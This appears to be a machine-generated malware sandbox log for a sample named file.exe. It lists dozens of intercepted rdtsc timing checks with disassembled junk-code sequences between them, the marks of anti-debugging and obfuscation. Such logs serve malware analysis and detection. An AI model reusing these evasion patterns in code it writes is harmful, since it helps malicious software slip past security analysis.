              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A112 second address: 108A13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FAE58F8563Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAE58F85644h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A512 second address: 108A51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAE58F85876h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A51C second address: 108A520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109318B second address: 10931C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jbe 00007FAE58F8587Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 jmp 00007FAE58F85883h 0x0000001a jmp 00007FAE58F85885h 0x0000001f pop edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091B39 second address: 1091B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091B3F second address: 1091B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FAE58F8587Ah 0x0000000c pop edi 0x0000000d jmp 00007FAE58F8587Ah 0x00000012 pushad 0x00000013 jmp 00007FAE58F85880h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b popad 0x0000001c jnp 00007FAE58F85886h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091B7A second address: 1091B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091DF6 second address: 1091DFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091DFC second address: 1091E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FAE58F85636h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F3B second address: 1091F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8587Eh 0x00000009 pushad 0x0000000a jp 00007FAE58F85876h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 jmp 00007FAE58F85880h 0x0000001b pop edx 0x0000001c jo 00007FAE58F8588Bh 0x00000022 jmp 00007FAE58F8587Fh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F82 second address: 1091F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10920F3 second address: 1092113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jng 00007FAE58F85876h 0x00000016 jne 00007FAE58F85876h 0x0000001c pop eax 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092113 second address: 1092119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092574 second address: 1092578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092B4B second address: 1092B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092B51 second address: 1092B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099042 second address: 109904E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAE58F85636h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109904E second address: 1099054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099054 second address: 109905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109905A second address: 1099060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10995D9 second address: 10995DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099877 second address: 109987B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109987B second address: 109987F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109987F second address: 1099885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099885 second address: 109989D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAE58F85638h 0x00000008 push eax 0x00000009 jmp 00007FAE58F8563Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099DCF second address: 1099DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099DD5 second address: 1099DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FAE58F85641h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099DF1 second address: 1099E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FAE58F85876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E06 second address: 1099E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E0A second address: 1099E14 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E14 second address: 1099E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E19 second address: 1099E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FAE58F85876h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E7CE second address: 109E7D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061388 second address: 106138C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10614E7 second address: 10614EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10614EE second address: 1061500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F8587Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061500 second address: 1061540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], esi 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FAE58F85638h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007FAE58F85643h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d push esi 0x0000002e pop esi 0x0000002f pop edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061C8F second address: 1061C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A21D9 second address: 10A21DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A21DD second address: 10A21E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAE58F85876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A21E9 second address: 10A2205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F85647h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24B6 second address: 10A24CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 je 00007FAE58F8587Eh 0x0000000d jnc 00007FAE58F85876h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24CB second address: 10A24D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24D3 second address: 10A24D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A24D7 second address: 10A2513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FAE58F85670h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007FAE58F8563Dh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAE58F85647h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A2674 second address: 10A267F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4A4F second address: 10A4A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A771E second address: 10A7722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB27 second address: 10ABB2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB2D second address: 10ABB39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB39 second address: 10ABB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB3F second address: 10ABB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F85880h 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FAE58F8587Eh 0x00000012 pop edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABF6B second address: 10ABF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABF6F second address: 10ABF9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85882h 0x00000007 jmp 00007FAE58F85886h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABF9F second address: 10ABFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABFA3 second address: 10ABFDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85888h 0x00000007 jg 00007FAE58F85876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007FAE58F85876h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jc 00007FAE58F85876h 0x00000025 push edx 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC15C second address: 10AC160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF8FE second address: 10AF902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF902 second address: 10AF908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFA6E second address: 10AFA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10231B3 second address: 10231B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5853 second address: 10B5861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAE58F85876h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B48DC second address: 10B48F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAE58F85641h 0x0000000a jmp 00007FAE58F8563Bh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061A63 second address: 1061AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FAE58F85878h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000004h 0x00000027 mov edi, ebx 0x00000029 movsx edx, di 0x0000002c nop 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FAE58F85886h 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4A05 second address: 10B4A32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAE58F85646h 0x0000000f jmp 00007FAE58F8563Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4A32 second address: 10B4A3C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4A3C second address: 10B4A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F85648h 0x00000008 jmp 00007FAE58F85646h 0x0000000d jne 00007FAE58F85636h 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB067 second address: 10BB06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB3AF second address: 10BB3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB3BA second address: 10BB3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FAE58F85876h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB651 second address: 10BB65F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8563Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB65F second address: 10BB66B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAE58F85876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB66B second address: 10BB66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBBF2 second address: 10BBC0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8587Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push ebx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBEBD second address: 10BBEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA1B second address: 101AA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007FAE58F85882h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA34 second address: 101AA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FAE58F85636h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA3E second address: 101AA54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8587Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA54 second address: 101AA58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C59C7 second address: 10C59CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4E97 second address: 10C4EA4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAE58F85636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C4EA4 second address: 10C4EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5696 second address: 10C56A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C56A4 second address: 10C56C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAE58F85876h 0x0000000a jmp 00007FAE58F85882h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD1C5 second address: 10CD1D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD1D1 second address: 10CD1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD1D5 second address: 10CD1FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8563Bh 0x00000007 jmp 00007FAE58F85642h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD1FA second address: 10CD20B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007FAE58F85876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD765 second address: 10CD77F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85645h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD77F second address: 10CD79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAE58F8587Ch 0x0000000f jnp 00007FAE58F85876h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD79B second address: 10CD7BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAE58F85646h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD91A second address: 10CD91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD91E second address: 10CD934 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FAE58F8563Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CE2ED second address: 10CE308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8587Bh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
